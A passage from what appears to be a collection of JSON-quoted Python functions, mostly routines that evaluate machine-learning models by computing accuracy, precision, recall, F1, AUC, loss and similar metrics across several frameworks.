\"{datasource}\" is not available. '\n f'Use \"run_experiments.py model={m} datasource={datasource} +experiment={d}\" to run this experiment.')\n\n if counter > 0:\n rmse_per_hour = pd.concat(rmse_per_hour)\n rmse_per_hour.to_csv(osp.join(output_dir, f'rmse_per_hour.csv'))\n\n mae_per_hour = pd.concat(mae_per_hour)\n mae_per_hour.to_csv(osp.join(output_dir, f'mae_per_hour.csv'))\n\n pcc_per_hour = pd.concat(pcc_per_hour)\n pcc_per_hour.to_csv(osp.join(output_dir, f'pcc_per_hour.csv'))\n\n bin_per_hour = pd.concat(bin_per_hour)\n bin_per_hour.to_csv(osp.join(output_dir, f'bin_per_hour.csv'))\n\n if fixed_t0:\n rmse_per_night = pd.concat(rmse_per_night)\n rmse_per_night.to_csv(osp.join(output_dir, f'rmse_per_night.csv'))\n\n mae_per_night = pd.concat(mae_per_night)\n mae_per_night.to_csv(osp.join(output_dir, f'mae_per_night.csv'))", "def compute(self) -> None:\n \n self.model.eval()\n \n with torch.no_grad():\n for (input, target, _) in self.loader:\n\n # self.model = self.model.train(False) # TEST @lacoupe\n output, _ = self.model(input)\n \n output = (output >= 0.5)\n \n for out, tar in zip(output, target):\n \n tar = bool(tar)\n \n if out and tar:\n self.confusion['true_positive'] += 1\n elif not out and not tar:\n self.confusion['true_negative'] += 1\n elif out and not tar:\n self.confusion['false_positive'] += 1\n elif not out and tar:\n self.confusion['false_negative'] += 1\n \n self.accuracy = (self.confusion['true_positive'] + self.confusion['true_negative']) \\\n / sum(list(self.confusion.values()))\n \n if (self.confusion['true_positive'] + self.confusion['false_positive']) == 0.:\n self.precision = 0.\n else:\n self.precision = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_positive'])\n \n if (self.confusion['true_positive'] + self.confusion['false_negative']) == 0.:\n self.recall = 0.\n else:\n self.recall = self.confusion['true_positive'] \\\n / (self.confusion['true_positive'] + self.confusion['false_negative'])\n \n if (self.precision + self.recall) == 0.:\n self.f1_score = 0.\n else:\n self.f1_score = 2 * self.precision * self.recall / (self.precision + self.recall)", "def evaluate(self) -> Dict[str, float]:\n eval_dataloader = self.get_eval_dataloader()\n\n output = self._prediction_loop(eval_dataloader, description=\"Evaluation\")\n return output.metrics", "def evaluate_model(model, X_test, Y_test, category_names):\n\n print(\"Testing Performance\")\n print(classification_report(Y_test, model.predict(X_test), target_names=category_names))\n\n #Todo cat names", "def _evaluate(self):\n coherence = gensim.models.coherencemodel.CoherenceModel(model=self.ldamodel,\n corpus=self.gensim_corpus,\n dictionary=self.ldamodel.id2word,\n coherence='u_mass')\n self.score = coherence.get_coherence()\n if self.verbose:\n print('LDA achieved a coherence (u_mass) of: ', self.score)", "def run(self):\n params = self.params\n\n # load data\n self.data = self.load_data()\n # check if loaded classification data set is using the same dict as pretrained model\n if not self.data['dico'] == self._embedder.dico:\n self.compare_dict(self.data['dico'], self._embedder.dico)\n raise Exception((\"Dictionary in evaluation data (%i words) seems different than the one \" +\n \"in the pretrained model (%i words). Please verify you used the same dictionary, \" +\n \"and the same values for max_vocab and min_count.\") % (len(self.data['dico']),\n len(self._embedder.dico)))\n\n # embedder\n self.encoder = copy.deepcopy(self._embedder)\n self.encoder.cuda()\n\n # projection layer: CHANGE 3 to your number of classes output\n self.proj = nn.Sequential(*[\n nn.Dropout(params.dropout),\n nn.Linear(self.encoder.out_dim, params.clf_output_dim)\n ]).cuda()\n\n # optimizers: use different optimizers to tune embedding layer and projection layer\n self.optimizer_e = get_optimizer(list(self.encoder.get_parameters(params.finetune_layers)), params.optimizer_e)\n self.optimizer_p = get_optimizer(self.proj.parameters(), params.optimizer_p)\n best_acc = 0\n eval_metric = \"CLF_valid_en_acc\"\n # train and evaluate the model\n for epoch in range(params.n_epochs):\n # update epoch\n self.epoch = epoch\n\n # training\n logger.info(\"CLF - Training epoch %i ...\" % epoch)\n self.train()\n\n # evaluation\n logger.info(\"CLF - Evaluating epoch %i ...\" % epoch)\n with torch.no_grad():\n scores = self.eval()\n if scores[eval_metric] > best_acc:\n logger.info('New best score for %s: %.6f' % (eval_metric, scores[eval_metric]))\n self.save_checkpoint('best-%s' % eval_metric)\n self.decrease_counts = 0\n best_acc = scores[eval_metric]\n else:\n logger.info(\"Not a better validation score (%i / %i).\"\n % (self.decrease_counts, self.decrease_counts_max))\n self.decrease_counts += 1\n if self.decrease_counts > self.decrease_counts_max:\n logger.info(\"Stopping criterion has been below its best value for more \"\n \"than %i epochs. Ending the experiment...\" % self.decrease_counts_max)\n exit()\n self.scores.update(scores)", "def _evaluate(model):\n _recompile(model)\n if isinstance(eval_dataset, tuple):\n eval_images, eval_labels = eval_dataset\n return model.evaluate(\n eval_images, eval_labels, verbose=verbose, return_dict=True)\n else:\n return model.evaluate(eval_dataset, verbose=verbose, return_dict=True)", "def mgcEval(self):\n import numpy as np\n def report_to_df(report):\n\n \"\"\"\n function to convert classification report to dataframe (for visualisation plot)\n \"\"\"\n\n report = re.sub(r\" +\", \" \", report).replace(\"avg / total\", \"avg/total\").replace(\"\\n \", \"\\n\")\n # update this due to sklearn classification report output change\n report = re.sub(r\" +\", \" \", report).replace(\"micro avg\", \"micro_avg\").replace(\"macro avg\", \"macro_avg\").replace(\"weighted avg\", \"weighted_avg\").replace(\"\\n \", \"\\n\")\n report_df = pd.read_csv(StringIO(\"Classes\" + report), sep=' ', index_col=0) \n return(report_df)\n \n #txt report to df\n class_rpttop1 = classification_report(self.y_true, self.y_pred)\n df_report = report_to_df(class_rpttop1)\n\n df_report = df_report.iloc[:self.nb_classes, :].copy()\n df_report.index = df_report.index.astype(int)\n \n\n # classifier prediction metrics\n def classMetrics(averagex):\n precision, recall, fscore, support = score(self.y_true, self.y_pred, average=averagex)\n \n return(\n print(''), \n print('-------------{0:}--------------------'.format(averagex)), \n print('precision: {0:.4f}'.format(precision)),\n print('recall: {0:.4f}'.format(recall)),\n print('fscore: {0:.4f}'.format(fscore)),\n print(''),\n print('kappa score: {0:.4f}'.format(cohen_kappa_score(self.y_true, self.y_pred))),\n print('accuracy score: {0:.4f}'.format(accuracy_score(self.y_true, self.y_pred))))\n \n def predSamp():\n\n correct = np.nonzero(self.y_pred==self.y_true)[0]\n incorrect = np.nonzero(self.y_pred!=self.y_true)[0]\n\n # quick check of the number of correct prediction from validation set\n print(\"\")\n print(\"correct/total = {0: .4f}\".format(len(correct)/(len(correct)+len(incorrect))))\n print(\"total correct sample = {0: .0f}\".format(len(correct)))\n print('------------------------------------------------------------------')\n \n def classReport():\n print('----------------------------- Classfication Report -------------------------------')\n print(classification_report(pd.Series(self.y_true).map(self.dict_label), pd.Series(self.y_pred).map(self.dict_label)))\n \n self.class_rpt = pd.concat([pd.DataFrame(pd.Series(df_report.index.tolist()).map(self.dict_label), columns = ['label']), df_report], axis = 1)\n \n self.classMetricsMac = classMetrics(\"macro\")\n self.classMetricsMic = classMetrics(\"micro\")\n self.predSample = predSamp()\n self.class_rptTop1 = classReport()\n \n return self", "def compute_objectives(self, predictions, batch, stage):\n\n p_ctc, wav_lens = predictions\n\n ids = batch.id\n tokens_eos, tokens_eos_lens = batch.tokens_eos\n tokens, tokens_lens = batch.tokens\n\n loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)\n\n if stage != sb.Stage.TRAIN:\n # Decode token terms to words\n sequence = sb.decoders.ctc_greedy_decode(\n p_ctc, wav_lens, blank_id=self.hparams.blank_index\n )\n\n predicted_words = self.tokenizer(sequence, task=\"decode_from_list\")\n\n # Convert indices to words\n target_words = undo_padding(tokens, tokens_lens)\n target_words = self.tokenizer(target_words, task=\"decode_from_list\")\n\n self.wer_metric.append(ids, predicted_words, target_words)\n self.cer_metric.append(ids, predicted_words, target_words)\n\n return loss", "def evaluate(model: torch.nn.Module, dataloader: torch.utils.data.DataLoader, show_progress: bool = True,\n device: torch.device = torch.device('cuda:0')):\n with torch.no_grad():\n model.to(device=device)\n sum_cross_entropy = torch.nn.BCEWithLogitsLoss(reduction='sum').to(device=device)\n scoring_loss = 0.\n scoring_predictions = []\n scoring_labels = []\n for scoring_data in tqdm(dataloader, total=len(dataloader), desc=\"Evaluating model\",\n disable=not show_progress, position=1):\n \n # Get samples as lists\n labels, inputs, sequence_lengths, counts_per_sequence, sample_ids = scoring_data\n \n # Apply attention-based sequence reduction and create minibatch\n labels, inputs, sequence_lengths, n_sequences = model.reduce_and_stack_minibatch(\n labels, inputs, sequence_lengths, counts_per_sequence)\n \n # Compute predictions from reduced sequences\n logit_outputs = model(inputs, n_sequences)\n prediction = torch.sigmoid(logit_outputs)\n \n # Compute mean of losses on-the-fly\n scoring_loss += sum_cross_entropy(logit_outputs, labels[..., -1]) / len(dataloader.dataset)\n \n # Store predictions and labels\n scoring_predictions.append(prediction)\n scoring_labels.append(labels[..., -1])\n \n # Compute BACC, F1, and AUC score\n scoring_predictions = torch.cat(scoring_predictions, dim=0).float()\n scoring_predictions_threshold = (scoring_predictions > 0.5).float()\n scoring_labels = torch.cat(scoring_labels).float()\n \n scoring_labels = scoring_labels.cpu().numpy()\n scoring_predictions = scoring_predictions.cpu().numpy()\n scoring_predictions_threshold = scoring_predictions_threshold.cpu().numpy()\n \n roc_auc = metrics.roc_auc_score(scoring_labels, scoring_predictions, average=None)\n bacc = metrics.balanced_accuracy_score(y_true=scoring_labels, y_pred=scoring_predictions_threshold)\n f1 = metrics.f1_score(y_true=scoring_labels, y_pred=scoring_predictions_threshold, average='binary',\n pos_label=1)\n return roc_auc, bacc, f1, scoring_loss", "def evaluate(self):\n\n\t\tself.model_score = self.model.evaluate(self.x_test, self.y_test, batch_size=2048)\n\t\tprint(\"%s score = %f\\n\" %(self.modelName, self.model_score[1]))\n\t\treturn self.model_score", "def evaluate(data_loader, model, device):\n\n\tmodel.eval()\n\ttotal_num_examples = 0\n\ttotal_error = 0\n\tfor idx, batch in enumerate(data_loader):\n\t\tquestion_feature_vec = batch['feature_vec'].to(device)\n\t\tquestion_len = batch['len'].to(device)\n\t\tlabels = batch['labels'].to(device)\n\n\t\t####Your code here ---\n\n\t\t# get the output from the model\n\t\tlogits = model(question_feature_vec, question_len)\n\n\t\t# get error, num_examples using accuracy_fn defined previously\n\t\terror, num_examples = accuracy_fn(logits, labels)\n\n\t\t# update total_error and total_num_examples\n\t\ttotal_error += error\n\t\ttotal_num_examples += num_examples\n\n\taccuracy = 1 - total_error / total_num_examples\n\treturn accuracy", "def test_evaluate():\n X_train, X_test, y_train, y_test = src.load()\n clf, score = src.train(X_train, y_train)\n test_score = src.evaluate(clf, X_test, y_test)\n assert isinstance(test_score, float)", "def evaluate_model(model, eval_path):\n with msg.loading(f\"Loading model '{model}'...\"):\n nlp = spacy.load(model)\n data, _ = format_data(srsly.read_jsonl(eval_path))\n sc = nlp.evaluate(data)\n result = [\n (\"Precision\", f\"{sc.ents_p:.3f}\"),\n (\"Recall\", f\"{sc.ents_r:.3f}\"),\n (\"F-Score\", f\"{sc.ents_f:.3f}\"),\n ]\n msg.table(result)", "def run_eval(gt_anno, pred_anno):\n coco = COCO(gt_anno)\n coco_dets = coco.loadRes(pred_anno)\n coco_eval = COCOeval(coco, coco_dets, \"keypoints\")\n coco_eval.evaluate()\n coco_eval.accumulate()\n coco_eval.summarize()\n coco_eval = COCOeval(coco, coco_dets, \"bbox\")\n coco_eval.evaluate()\n coco_eval.accumulate()\n coco_eval.summarize()", "def evaluate(model, X, y):\n\tmodel.eval()\n\n\t# make the predictions\n\ty_hat = predict(model,X)\n\n\t# convert to cpu\n\ty_hat = y_hat.detach().cpu()\n\ty = y.detach().cpu()\n\n\t# compute evaluation metrics\n\taccuracy = accuracy_score(y, y_hat)\n\tprf \t = precision_recall_fscore_support(y, y_hat, labels=[0,1], average='macro')\n\n\treturn accuracy, prf", "def evaluate(self, warning=True, store=True):\n # Calculate and report our model's accuracy.\n accuracy = self.learner.score(self.all_data, self.all_labels)\n\n # Find model predictions\n self.y_preds = self.learner.predict(self.all_data)\n\n # Calculated confusion matrix\n cm = confusion_matrix(self.all_labels, self.y_preds)\n\n # To prevent nan value for precision, we set it to 1 and send out a warning message\n if cm[1][1] + cm[0][1] != 0:\n precision = cm[1][1] / (cm[1][1] + cm[0][1])\n else:\n precision = 1.0\n if warning:\n print('WARNING: zero division during precision calculation')\n\n recall = cm[1][1] / (cm[1][1] + cm[1][0])\n true_negative = cm[0][0] / (cm[0][0] + cm[0][1])\n bcr = 0.5 * (recall + true_negative)\n\n if store:\n self.store_metrics_to_model(cm, accuracy, precision, recall, bcr)", "def evaluate(self, ts_loader=None):\n # start evaluation of the model\n self.tr_model.eval()\n samples, correct = 0, 0\n \n # check if a dataloader was provided for evaluation\n loader = self.ts_loader if not ts_loader else ts_loader\n \n with torch.no_grad():\n for x, y in loader:\n \n x, y = x.to(device), y.to(device)\n \n y_ = self.tr_model(x)\n _, predicted = torch.max(y_.detach(), 1)\n \n samples += y.shape[0]\n correct += (predicted == y).sum().item()\n \n # return evaluation statistics\n return {\"accuracy\" : correct/samples}", "def eval(self):\n\n # parameters initialize\n torch = import_optional_dependency(\"torch\")\n eval_total = 0\n eval_correct = 0\n eval_loss = 0\n self._set_eval()\n\n # display the information\n if self.info:\n print(f\"\\rEvaluating...\", end=\"\")\n\n # start eval part\n for i, (source, target) in enumerate(self.eval_dataset):\n # send data to device\n source = source.to(self.device)\n target = target.to(self.device)\n\n result = self.model(source)\n eval_loss += self.criterion(result, target).item()\n _, predicted = torch.max(result.data, 1)\n eval_total += target.size(0)\n eval_correct += (predicted == target).sum().item()\n\n accuracy = eval_correct / eval_total\n eval_loss = eval_loss / eval_total\n\n if self.info:\n print(f\"\\rEvaluation loss: { eval_loss } | Accuracy: { accuracy }\")\n\n return eval_loss, accuracy", "def evaluate(self, data: ExchangeObject, extra: dict | None = None) -> ExchangeObject:\n self._set_cuda_device()\n\n if extra is None:\n extra = {}\n if not isinstance(data, ExchangeObject):\n raise ValueError(f\"expected data to be ExchangeObject but received {type(data)}\")\n\n if self.evaluator is None:\n raise ValueError(\"self.evaluator should not be None.\")\n if self.pre_filters is not None:\n for _filter in self.pre_filters:\n data = _filter(data, extra)\n\n self.phase = FlPhase.EVALUATE\n self.logger.info(f\"Load {self.client_name} weights...\")\n local_var_dict = get_state_dict(self.evaluator.network)\n global_weights, n_converted = convert_global_weights(\n global_weights=cast(dict, data.weights), local_var_dict=local_var_dict\n )\n self._check_converted(data.weights, local_var_dict, n_converted)\n\n _, updated_keys, _ = copy_model_state(src=global_weights, dst=self.evaluator.network)\n if len(updated_keys) == 0:\n self.logger.warning(\"No weights loaded!\")\n self.logger.info(f\"Start {self.client_name} evaluating...\")\n if isinstance(self.trainer, Trainer):\n self.evaluator.run(self.trainer.state.epoch + 1)\n else:\n self.evaluator.run()\n return_metrics = ExchangeObject(metrics=self.evaluator.state.metrics)\n\n if self.post_evaluate_filters is not None:\n for _filter in self.post_evaluate_filters:\n return_metrics = _filter(return_metrics, extra)\n return return_metrics", "def test_evaluate(self):\n # Check build does not raise errors\n dataset = KDDCupDataset()\n dataset.create_fixed_samples(\n *self.data, samples_num=1, partition_sizes=self.partition_sizes)\n dataset.set_current_sample(0)\n model = self.MODEL(dataset, **self.model_arguments)\n model.fit(training_epochs=50)\n metric = model.evaluate('test')\n self.assertLessEqual(0, metric)\n self.assertGreaterEqual(1, metric)", "def evaluate_performance(data_loader, model):\n acc = mx.metric.Accuracy()\n\n for idx, (data, label) in enumerate(data_loader):\n data = data.as_in_context(model.ctx)\n label = label.as_in_context(model.ctx)\n pred = model(data)\n pred = mx.nd.argmax(pred, axis=1)\n acc.update(label, pred)\n return acc.get()", "def compute(self, idx, input_scores, input_names):\n title = self._legends[idx] if self._legends is not None else None\n headers = [\"\" or title, \"Dev. %s\" % input_names[0]]\n if self._eval and input_scores[1] is not None:\n headers.append(\"eval % s\" % input_names[1])\n if self._criterion == \"rr\":\n rr = bob.measure.recognition_rate(input_scores[0], self._thres[idx])\n dev_rr = \"%.1f%%\" % (100 * rr)\n raws = [[\"RR\", dev_rr]]\n if self._eval and input_scores[1] is not None:\n rr = bob.measure.recognition_rate(\n input_scores[1], self._thres[idx]\n )\n eval_rr = \"%.1f%%\" % (100 * rr)\n raws[0].append(eval_rr)\n click.echo(\n tabulate(raws, headers, self._tablefmt), file=self.log_file\n )\n elif self._criterion == \"mindcf\":\n if \"cost\" in self._ctx.meta:\n cost = self._ctx.meta.get(\"cost\", 0.99)\n threshold = (\n bob.measure.min_weighted_error_rate_threshold(\n input_scores[0][0], input_scores[0][1], cost\n )\n if self._thres is None\n else self._thres[idx]\n )\n if self._thres is None:\n click.echo(\n \"[minDCF - Cost:%f] Threshold on Development set `%s`: %e\"\n % (cost, input_names[0], threshold),\n file=self.log_file,\n )\n else:\n click.echo(\n \"[minDCF] User defined Threshold: %e\" % threshold,\n file=self.log_file,\n )\n # apply threshold to development set\n far, frr = bob.measure.farfrr(\n input_scores[0][0], input_scores[0][1], threshold\n )\n dev_far_str = \"%.1f%%\" % (100 * far)\n dev_frr_str = \"%.1f%%\" % (100 * frr)\n dev_mindcf_str = \"%.1f%%\" % (\n (cost * far + (1 - cost) * frr) * 100.0\n )\n raws = [\n [\"FAR\", dev_far_str],\n [\"FRR\", dev_frr_str],\n [\"minDCF\", dev_mindcf_str],\n ]\n if self._eval and input_scores[1] is not None:\n # apply threshold to development set\n far, frr = bob.measure.farfrr(\n input_scores[1][0], input_scores[1][1], threshold\n )\n eval_far_str = \"%.1f%%\" % (100 * far)\n eval_frr_str = \"%.1f%%\" % (100 * frr)\n eval_mindcf_str = \"%.1f%%\" % (\n (cost * far + (1 - cost) * frr) * 100.0\n )\n raws[0].append(eval_far_str)\n raws[1].append(eval_frr_str)\n raws[2].append(eval_mindcf_str)\n click.echo(\n tabulate(raws, headers, self._tablefmt), file=self.log_file\n )\n elif self._criterion == \"cllr\":\n cllr = bob.measure.calibration.cllr(\n input_scores[0][0], input_scores[0][1]\n )\n min_cllr = bob.measure.calibration.min_cllr(\n input_scores[0][0], input_scores[0][1]\n )\n dev_cllr_str = \"%.1f%%\" % cllr\n dev_min_cllr_str = \"%.1f%%\" % min_cllr\n raws = [[\"Cllr\", dev_cllr_str], [\"minCllr\", dev_min_cllr_str]]\n if self._eval and input_scores[1] is not None:\n cllr = bob.measure.calibration.cllr(\n input_scores[1][0], input_scores[1][1]\n )\n min_cllr = bob.measure.calibration.min_cllr(\n input_scores[1][0], input_scores[1][1]\n )\n eval_cllr_str = \"%.1f%%\" % cllr\n eval_min_cllr_str = \"%.1f%%\" % min_cllr\n raws[0].append(eval_cllr_str)\n raws[1].append(eval_min_cllr_str)\n click.echo(\n tabulate(raws, headers, self._tablefmt), file=self.log_file\n )\n else:\n title = self._legends[idx] if self._legends is not None else None\n all_metrics = self._get_all_metrics(idx, input_scores, input_names)\n headers = [\" \" or title, \"Development\"]\n rows = [\n [self.names[0], all_metrics[0][0]],\n [self.names[1], all_metrics[0][1]],\n [self.names[2], all_metrics[0][2]],\n [self.names[3], all_metrics[0][3]],\n [self.names[4], all_metrics[0][4]],\n [self.names[5], all_metrics[0][5]],\n ]\n\n if self._eval:\n # computes statistics for the eval set based on the threshold a\n # priori\n headers.append(\"Evaluation\")\n rows[0].append(all_metrics[1][0])\n rows[1].append(all_metrics[1][1])\n rows[2].append(all_metrics[1][2])\n rows[3].append(all_metrics[1][3])\n rows[4].append(all_metrics[1][4])\n rows[5].append(all_metrics[1][5])\n\n click.echo(\n tabulate(rows, headers, self._tablefmt), file=self.log_file\n )", "def eval(self):\n params = self.params\n langs = ['en', params.target_lang]\n self.encoder.eval()\n self.proj.eval()\n\n scores = OrderedDict({'epoch': self.epoch})\n\n for splt in ['valid', 'test']:\n\n for lang in langs:\n if lang == 'en' and splt == 'test' or lang != 'en' and splt == 'valid':\n continue\n lang_id = params.lang2id[lang if lang != 'jp' else 'ja']\n valid = 0\n total = 0\n\n for batch in self.get_iterator(splt, lang):\n # batch\n (sent1, len1), idx = batch\n # set max length to 256, avoid position embedding overflow and save time.\n x, lengths = truncate(sent1, len1, 256, params.eos_index)\n lang_ids = x.clone().fill_(lang_id)\n\n y = self.data[lang][splt]['y'][idx]\n\n # cuda\n x, y, lengths, lang_ids = to_cuda(x, y, lengths, lang_ids)\n\n # forward\n output = self.proj(self.encoder.get_embeddings(x, lengths, langs=lang_ids))\n predictions = output.data.max(1)[1]\n\n # update statistics\n valid += predictions.eq(y).sum().item()\n total += len(len1)\n\n # compute accuracy\n acc = 100.0 * valid / total\n scores['CLF_%s_%s_acc' % (splt, lang)] = acc\n logger.info(\"CLF - %s - %s - Epoch %i - Acc: %.1f%%\" % (splt, lang, self.epoch, acc))\n\n logger.info(\"__log__:%s\" % json.dumps(scores))\n return scores", "def evaluate(net, data_loader):\n net.reset()\n target_scores = []\n non_target_scores = []\n for data in tqdm(data_loader):\n sample_input, output = data[0], data[1]\n sample_input = whiten(sample_input)\n mask, score = gate_activation(net, sample_input)\n selected_score = score[mask]\n if selected_score.size == 0:\n xo = 0.5\n else:\n xo = np.sum(selected_score) / selected_score.size\n if output == 1:\n target_scores.append(xo)\n else:\n non_target_scores.append(xo)\n\n target_scores = np.array(target_scores)\n non_target_scores = np.array(non_target_scores)\n\n pmiss, pfa = rocch(target_scores, non_target_scores)\n eer = rocch2eer(pmiss, pfa)\n\n return eer", "def evaluate(self, X, y, w):\n value, prediction = self.predict(X, w)\n if self.loss == 'linear' or self.loss == 'logistic':\n Error = np.sum((value - y) ** 2)\n elif self.loss == 'perceptron':\n newY = (y > 0).astype(int) * 2 - 1 # change from (0, 1) to (-1, 1)\n tmp = - value * newY\n Error = np.sum(tmp[tmp > 0])\n elif self.loss == 'svm':\n newY = (y > 0).astype(int) * 2 - 1 # change from (0, 1) to (-1, 1)\n tmp = 1 - value * newY\n h = np.sum(tmp[tmp > 0])\n Error = np.sum(w ** 2) + self.C * h\n\n Error = Error / len(y)\n Acc = np.sum(prediction == y) / len(y)\n\n return Error, Acc", "def _compute_wedging_human_eval(\n adapter_spec: AdapterSpec, request_state: RequestState, eval_cache_path: str\n) -> List[Stat]:\n results: List[Stat] = []\n instance_first_line = request_state.instance.input.text.splitlines()[0]\n human_evaluations = _fetch_human_evaluation_results(eval_cache_path, WEDGING_HUMAN_EVAL_FILE)\n model_results = human_evaluations.get(adapter_spec.model)\n\n if not model_results:\n # Trying to evaluate a model we don't have annotations for\n return results\n\n thesis_results = model_results.get(instance_first_line)\n if not thesis_results:\n # Trying to evaluate a thesis we don't have annotations for\n return results\n\n results.extend(\n [\n Stat(MetricName(\"wedging_eval_address_intended_audience\")).add(\n np.mean(thesis_results.get(\"q1_address_audience\", []))\n ),\n Stat(MetricName(\"wedging_eval_include_intended_goal\")).add(\n np.mean(thesis_results.get(\"q2_support_goal\", []))\n ),\n Stat(MetricName(\"wedging_eval_style\")).add(np.mean(thesis_results.get(\"q3_style\", []))),\n Stat(MetricName(\"wedging_eval_divisiveness\")).add(np.mean(thesis_results.get(\"q4_divisive\", []))),\n Stat(MetricName(\"wedging_eval_toxicity\")).add(np.mean(thesis_results.get(\"q5_toxic\", []))),\n ]\n )\n\n return results", "def test_evaluate(self):\n # test normalized by 'bbox'\n pck_metric = PCKAccuracy(thr=0.5, norm_item='bbox')\n pck_metric.process(self.data_batch, self.data_samples)\n pck = pck_metric.evaluate(self.batch_size)\n target = {'PCK': 1.0}\n self.assertDictEqual(pck, target)\n\n # test normalized by 'head_size'\n pckh_metric = PCKAccuracy(thr=0.3, norm_item='head')\n pckh_metric.process(self.data_batch, self.data_samples)\n pckh = pckh_metric.evaluate(self.batch_size)\n target = {'PCKh': 1.0}\n self.assertDictEqual(pckh, target)\n\n # test normalized by 'torso_size'\n tpck_metric = PCKAccuracy(thr=0.05, norm_item=['bbox', 'torso'])\n tpck_metric.process(self.data_batch, self.data_samples)\n tpck = tpck_metric.evaluate(self.batch_size)\n self.assertIsInstance(tpck, dict)\n target = {\n 'PCK': 1.0,\n 'tPCK': 1.0,\n }\n self.assertDictEqual(tpck, target)", "def evaluate(args, dev_dataset, model):\n\n if args.dynamic_batching:\n dev_sampler = CustomBatchSampler(dev_dataset, args.dev_batch_size)\n dev_dataloader = DataLoader(\n dev_dataset,\n batch_sampler=dev_sampler,\n num_workers=0,\n collate_fn=dynamic_padding_collate_fn\n )\n else:\n dev_sampler = SequentialSampler(dev_dataset)\n dev_dataloader = DataLoader(dev_dataset, sampler=dev_sampler,\n batch_size=args.dev_batch_size, num_workers=0)\n\n model.eval()\n loss_fn = nn.CrossEntropyLoss(ignore_index=0)\n iterator = tqdm(dev_dataloader, desc=\"Evaluation\", smoothing=0.05)\n loss_cum = None\n num_batch = 0\n for step, batch_cpu in enumerate(iterator):\n num_batch += 1\n\n batch = tuple(t.to(args.device) for t in batch_cpu)\n inputs = {\n \"input_ids\": batch[0],\n \"attention_mask\": batch[1],\n \"token_type_ids\": batch[2],\n }\n\n with torch.no_grad():\n outputs = model(**inputs)\n\n # Calculate loss of just the question part\n q_mask = (inputs['token_type_ids'] == 2)\n masked_labels = inputs['input_ids'].masked_fill(~q_mask, 0)\n shift_labels = masked_labels[..., 1:].contiguous()\n\n lm_logits = outputs[0]\n shift_logits = lm_logits[..., : -1, :].contiguous()\n loss = loss_fn(shift_logits.view(-1, shift_logits.size(-1)),\n shift_labels.view(-1))\n\n if loss_cum is None:\n loss_cum = loss\n else:\n loss_cum += loss\n\n model.train()\n\n return loss_cum.item() / num_batch", "def evaluate(model, g, val_nid, device):\n model.eval()\n nfeat = g.ndata['features']\n labels = g.ndata['labels']\n with th.no_grad():\n pred = model.module.inference(g, nfeat, device, args.batch_size, args.num_workers)\n model.train()\n test_acc = Accuracy()\n return test_acc(th.softmax(pred[val_nid], -1), labels[val_nid].to(pred.device))", "def evaluate_model_performance():\n\n config = load_config()\n data_processor = DataProcessor()\n df_test = data_processor.create_user_click_sequence(\n start_date=config[\"test_split_date\"]\n )\n df_test[\"truths\"] = df_test[\"merchant_seq\"].apply(lambda x: list(set(x)))\n truth_dict = dict(zip(df_test[\"user_id\"], df_test[\"truths\"]))\n\n # get model\n print(\"model training...\")\n model = Merchant2VecModel()\n model.train()\n\n # compute mAP@k\n k = model.num_rec\n all_truths, all_preds = [], []\n for user_id, user_merchants in truth_dict.items():\n this_pred = model.generate_predictions(\n user_id=user_id, eval_date=config[\"test_split_date\"]\n )\n all_truths.append(user_merchants)\n all_preds.append(this_pred)\n score = mapk(all_truths, all_preds, k)\n print(\"mAP@{} for current model: {:.4f}\".format(k, score))", "def cingValidation(self): \n \n self.cingRun()\n \n self.analyseCingResults()", "def evaluate_model(model, X_test, Y_test, category_names):\n y_pred = pd.DataFrame(data = model.predict(X_test), columns = category_names)\n\n precision, recall, f1_score = [], [], []\n\n for category in category_names:\n scores = classification_report(Y_test[category], y_pred[category])\n precision.append([x for x in scores.strip().split(\"avg / total\")[1].strip().split(\" \") \n if len(x) > 0][:3][0])\n recall.append([x for x in scores.strip().split(\"avg / total\")[1].strip().split(\" \") \n if len(x) > 0][:3][1])\n \n model_metric = pd.concat([\n pd.DataFrame(data = [precision, recall], index = [\"precision\", \"recall\"], \n columns = category_names),\n (Y_test.reset_index() == y_pred.reset_index()).mean()[1:].to_frame(\"accuracy\").T\n ])\n\n for col in model_metric.columns:\n model_metric[col] = model_metric[col].astype(float)\n\n return model_metric", "def compute_metrics(self):\n pass", "def evaluate_model(model, X_train, y_train, X_test, y_test):\n model = model\n model.fit(X_train, y_train)\n\n y_pred = model.predict(X_test)\n\n report = classificationreport(y_test, y_pred, target_names= [\"0\", \"1\"], output_dict=True)\n\n return report", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def eval(model, device, validloader, loss_function, best_acc):\n model.eval()\n running_loss, total_count, total_acc, auc = 0, 0, 0, 0\n with torch.no_grad():\n for i, (input, target) in enumerate(validloader):\n # load data into cuda\n input, target = input.to(device), target.unsqueeze(1).to(device, dtype=torch.float)\n \n # zero gradient\n optimizer.zero_grad()\n\n if 'tworesnet' in args.model:\n mel, mfcc = input[0], mfcc[1]\n \n # forward\n predict = model(mel, mfcc)\n\n else:\n predict = model(input)\n\n loss = loss_function(predict, target)\n\n # metric\n running_loss += loss.item()\n total_acc += binary_acc(predict, target)\n total_count += predict.shape[0]\n\n auc += plot_roc_auc(y_pred=predict, y_true=target, save_dir=save_dir)\n\n total_loss = running_loss/len(validloader)\n epoch_auc = auc/len(validloader)\n accuracy = total_acc/total_count\n\n # export weight\n if accuracy>best_acc:\n torch.save(model.state_dict(), os.path.join(save_dir,'weight.pth'))\n return total_loss, accuracy, epoch_auc", "def evaluate(weights: fl.common.Weights) -> Optional[Tuple[float, float]]:\n model = models.load_model(glb.MODEL)\n model.set_weights(weights)\n model.to(DEVICE)\n testloader = torch.utils.data.DataLoader(testset, batch_size=32, shuffle=False)\n # using pytorch for central evaluation, can be tensorflow as well\n return modules.pt_test(model, testloader, device=DEVICE)", "def evaluate_model(model_name, y_true, y_pred):\n\n # Calculate performance metrics\n rmse_eval = evaluate_rmse(y_true, y_pred)\n mae_eval = evaluate_mae(y_true, y_pred) \n r2_eval = evaluate_r2(y_true, y_pred)\n\n # Print results\n print_evaluation(model_name, mae_eval, rmse_eval, r2_eval)", "def evaluate(net, dev, batcher): \n def accuracy(outputs, labels):\n correct = 0\n total = 0\n misclassified = []\n for (i, output) in enumerate(outputs):\n total += 1\n if labels[i] == output.argmax():\n correct += 1 \n return correct, total, misclassified\n val_loader = batcher(dev, 128)\n total_val_loss = 0\n correct = 0\n total = 0\n misclassified = []\n loss = torch.nn.CrossEntropyLoss() \n for data in val_loader:\n inputs = data[:,1:]\n labels = 